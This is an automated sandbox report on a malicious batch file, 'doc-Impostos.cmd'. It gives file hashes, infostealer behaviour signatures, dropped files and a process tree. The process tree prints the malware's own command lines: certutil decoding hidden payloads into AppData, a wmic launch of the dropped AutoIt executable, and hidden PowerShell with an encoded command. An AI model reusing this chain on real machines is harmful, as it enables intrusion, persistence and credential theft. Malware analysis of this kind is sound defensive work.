Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags
    arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
  • submitted
    02/01/2023, 13:05

General

  • Target
    doc-Impostos.cmd
  • Size
    1.4MB
  • MD5
    c76daaa1b0caaf00f820581c3d848581
  • SHA1
    279e002d57cf3dfa1faa4a5d22d77c6b29fe9f6c
  • SHA256
    7ff62cc43a03065fe50371080e849b0779cb0f1ec308b24eca6b5ce1bf6b6ad3
  • SHA512
    01f8a45568d0b508d09609e0659bb332a3509944039208bfc9ca18f66a63a179a7119aad54d92a514cb3962d3801459f3a527984a2e4c4c6b30063e1a55ec471
  • SSDEEP
    24576:0b0FVefPot0YZeHsCrhGbfAjespJNj5e1byXc628L:to45oeuIQtL

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • NTFS ADS 1 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\doc-Impostos.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\doc-Impostos.cmd"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Windows\system32\more.com
        more +5 C:\Users\Admin\AppData\Local\Temp\doc-Impostos.cmd
        3⤵
          PID:1556
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "(gc ~~) -replace '>', '' | Out-File -encoding ASCII ~~"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:472
        • C:\Windows\system32\certutil.exe
          certutil -decode -f ~~ "C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe"
          3⤵
            PID:1128
          • C:\Windows\system32\certutil.exe
            certutil -decode -f C:\Users\Admin\AppData\Local\Temp\doc-Impostos.cmd "C:\Users\Admin\AppData\Roaming\glover\a3x\wrenn\doc-Impostos.a3x"
            3⤵
              PID:2000
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process call create '"C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe" "C:\Users\Admin\AppData\Roaming\glover\a3x\wrenn\doc-Impostos.a3x" ""' ,C:\Users\Admin\AppData\Local\Temp\
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1264
            • C:\Windows\system32\timeout.exe
              timeout /T 5
              3⤵
              • Delays execution with timeout.exe
              PID:968
        • C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe
          "C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe" "C:\Users\Admin\AppData\Roaming\glover\a3x\wrenn\doc-Impostos.a3x" ""
          1⤵
          • Executes dropped EXE
          • Drops startup file
          • Loads dropped DLL
          • Accesses Microsoft Outlook profiles
          • NTFS ADS
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:992
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded 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
            2⤵
            • Blocklisted process makes network request
            • Drops startup file
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:864

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\~~
    Filesize: 1.4MB
    MD5: f048ee2c96103015e19d9d4e41a1adbc
    SHA1: c531744376c0a64329b5a9c7e35765b3eb03a60b
    SHA256: 4d10b7047b6334ea5d9ec2f5db44583b18d4c85de584323e425eb47360acc43c
    SHA512: ca2570f7f9f60457fc0a8133118d609ab093db99d4fc86f915488215abf1adc7f28ac3b2388d6192d2b1b42c931676fd39785894e3edb771b77979006f6bcb16

  • C:\Users\Admin\AppData\Local\Temp\~~
    Filesize: 1.3MB
    MD5: fb8da432cd6b0e8117c141688b17bda4
    SHA1: 82bc9bb64e960fda81cb0900b0dc3d24fea77325
    SHA256: f532a1653ef1d202b14cb7d795efc331b6d985681a9ab8d442cef404fc451f5a
    SHA512: f9738096b7aa56f655be0aef3e00bc10b6f1f9f6d622d61fabb2efce264bb6c6ba361183d5e773afb043f8d69a89c9341cbaaddd6aeccff57826abeed9087f63

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverAudio.lnk
    Filesize: 4KB
    MD5: 32dabc97be5028fb6da5786fae16d636
    SHA1: 5577d5041835996aff43dc3afe16a74a1278a9bf
    SHA256: b1034dff677d59028bd89571c2bbf772dc31af29e76804e9763c3cb5cdf09126
    SHA512: ed3ea06f629cdeedbf8db6a3623449001fcca8e89c38dcf8d301158f97b3ded92b303763cfe3c84bdaee0e9550b42829842ff7098385e444e70a2785963f6adf

  • C:\Users\Admin\AppData\Roaming\glover\a3x\wrenn\doc-Impostos.a3x
    Filesize: 115KB
    MD5: bfb28cda03f6b0e1df19176614772d75
    SHA1: a64ef88d61e7dfae057f161cfb57a762c8afc9db
    SHA256: 5a679cab55d3f050e304ab0cf2ee28ce8e4f70cc355bb349ed97aa5d6ad9a2e3
    SHA512: 333f1538045a7a50692041208464526e0feb825b75469bb16ca4ebf3b0a1cc05720f9b0ef07edc69fede52f907e1fcc1945183a881a85825e0041d0bbac747b3

  • C:\Users\Admin\AppData\Roaming\glover\exe\VMIDDL~1\whitaker.exe
    Filesize: 872KB
    MD5: c56b5f0201a3b3de53e561fe76912bfd
    SHA1: 2a4062e10a5de813f5688221dbeb3f3ff33eb417
    SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
    SHA512: 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

  • C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe
    Filesize: 872KB
    MD5: c56b5f0201a3b3de53e561fe76912bfd
    SHA1: 2a4062e10a5de813f5688221dbeb3f3ff33eb417
    SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
    SHA512: 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

  • \Users\Admin\AppData\Local\Temp\sqlite3.dll
    Filesize: 858KB
    MD5: c7719f774bb859240eb6dfa91a1f10be
    SHA1: be1461e770333eb13e0fe66d378e3fac4f1112b5
    SHA256: b3ce811fb696b94f9117ee7fe725ae6b907d695636beceeb1672d5d5eeb81df4
    SHA512: 8a561e927a7a65f5211c76b488bed2a3cc0525ecd9775d25e1863b52ff532349c125b76a51eb63ea2e4479a567e8fac6b8ae38b7fd1970bad2556befe9e3b529

  • memory/472-64-0x00000000027A4000-0x00000000027A7000-memory.dmp
    Filesize: 12KB
  • memory/472-61-0x000000001B6F0000-0x000000001B9EF000-memory.dmp
    Filesize: 3.0MB
  • memory/472-63-0x00000000027AB000-0x00000000027CA000-memory.dmp
    Filesize: 124KB
  • memory/472-58-0x000007FEF3450000-0x000007FEF3E73000-memory.dmp
    Filesize: 10.1MB
  • memory/472-65-0x00000000027AB000-0x00000000027CA000-memory.dmp
    Filesize: 124KB
  • memory/472-60-0x00000000027A4000-0x00000000027A7000-memory.dmp
    Filesize: 12KB
  • memory/472-57-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp
    Filesize: 8KB
  • memory/472-59-0x000007FEF28F0000-0x000007FEF344D000-memory.dmp
    Filesize: 11.4MB
  • memory/864-81-0x0000000072F70000-0x000000007351B000-memory.dmp
    Filesize: 5.7MB
  • memory/864-82-0x0000000072F70000-0x000000007351B000-memory.dmp
    Filesize: 5.7MB
  • memory/992-74-0x00000000760C1000-0x00000000760C3000-memory.dmp
    Filesize: 8KB
  • memory/1128-67-0x00000000FFA01000-0x00000000FFA03000-memory.dmp
    Filesize: 8KB
  • memory/2000-70-0x00000000FF391000-0x00000000FF393000-memory.dmp
    Filesize: 8KB